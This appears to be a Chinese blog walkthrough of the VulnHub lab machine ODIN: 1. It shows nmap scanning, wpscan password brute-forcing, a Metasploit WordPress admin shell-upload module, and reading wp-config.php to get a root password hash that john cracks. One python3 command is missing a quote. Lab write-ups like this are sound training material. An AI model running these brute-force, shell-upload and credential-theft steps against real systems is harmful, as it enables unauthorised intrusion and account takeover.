vulnhub靶机-ODIN: 1

靶机描述:

1、找到靶机ip:192.168.75.14

nmap -sn 192.168.75.14

2、扫描靶机端口

root@chounana:~# nmap -p- -A 192.168.75.14
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for odin (192.168.75.14)
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.5.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: vikingarmy – Just another Joomla site
MAC Address: 08:00:27:88:3A:32 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/6%OT=80%CT=1%CU=34504%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5FF59DB7%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=107%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms odin (192.168.75.14)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.13 seconds
root@chounana:~# 

3、就只有一个80端口,这里访问之后,随便访问一下,会跳到http://odin/,其实前面提示就说了,要把192.168.75.14 odin添加到/etc/hosts文件中,再次访问odin,成功跳出页面

看到这个名字就觉得像wp网站,试了一下wp-admin后台,发现确实存在,扫描目录也能得到特征目录,确实是wp网站,先用wpscan扫描一下漏洞插件和用户,没什么发现,尝试爆破密码,在后台输入admin+密码(乱输),发现提示密码错误,说明admin用户存在

使用wpscan爆破密码:

wpscan --url http://odin --usernames admin --passwords /usr/share/wordlists/rockyou.txt

 

拿到用后台用户名和密码之后就好办了,反弹shell方法就很多了,前面用过的就是修改404.php页面,这里我演示使用msfconsole反弹shell,命令如下

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS odin
set username admin
set password qwerty
run
shell

没有python,使用python3提权到tty,命令:python3 -c "import pty;pty.spawn('/bin/bash)",在wp-config.php文件发现root用户加密的密码

www-data@osboxes:$ cd /var/www/html
cd /var/www/html
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
www-data@osboxes:/var/www/html$ ls
ls
index.php        wp-blog-header.php    wp-cron.php        wp-mail.php
license.txt      wp-comments-post.php  wp-includes        wp-settings.php
readme.html      wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php  wp-config.php         wp-load.php        wp-trackback.php
wp-admin         wp-content            wp-login.php       xmlrpc.php
www-data@osboxes:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );

/** MySQL database username */
define( 'DB_USER', 'joomla' );

/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY',  '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY',    'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY',        '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT',        '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' );
define( 'LOGGED_IN_SALT',   '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT',       'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
www-data@osboxes:/var/www/html$ 

4、使用john破解密码:jasmine

然后使用前面的shell,切换到root用户,得到flag,base64解密得到一个视频链接,访问了一下,是一段音乐

 

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值